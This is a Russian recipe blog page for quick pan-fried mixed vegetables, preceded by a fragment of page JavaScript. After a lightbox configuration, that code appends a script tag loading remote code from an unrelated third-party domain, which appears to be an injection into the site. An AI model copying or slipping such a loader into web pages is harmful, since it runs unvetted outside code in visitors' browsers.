, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })

Вкусно + Полезно

Жареные овощи


ovoschi_prosto1Продолжая тему здорового питания, и добавив к ней простоту приготовления, хочу предложить вам на ужин незатейливое, но очень полезное и вкусное блюдо из овощей. Причем предлагаю экспериментировать и не привязываться к предложенным мною ингредиентам. Сюда пойдут любые овощи. Главное, чтобы их было хотя бы 4-5 видов.

Что и сколько берем:

1. 2-3 луковицы

2. 1 большую морковь

3. полкачана брокколи

4. полкачана цветной капусты

5. маленький кабачок

6. Смесь «Прованские травы» или «Итальянские травы» или любые травы по вкусу (сушеные конечно же)

 Готовим:

Итак, важно взять для готовки мелкую сковороду, овощи нарезать некрупно, сковороду сильно разогреть, добавить оливковое масло и выложить ВСЕ нарезанные овощи сразу. Успеть отскочить от плиты, ибо масло начнет брызгаться и стреляться. Вернувшись к плите в защитной одежде и очках, быстро мешать овощи минут 5. Посолить, поперчить и всыпать смесь трав.  Рекомендую жарить не более 5 минут: овощи должны быть твердоватыми. Возможно добавить в уже готовое блюдо соевый соус и посыпать кунжутом. Общее время на приготовление данного блюда не более 15 минут. И просто, и вкусно, и полезно! Приятного аппетита.

На эту тему вы можете почитать:

Салат из брокколи с моцареллой
Картофель по-тоскански
Цветная капуста в яйце

Тэги:



Добавить комментарий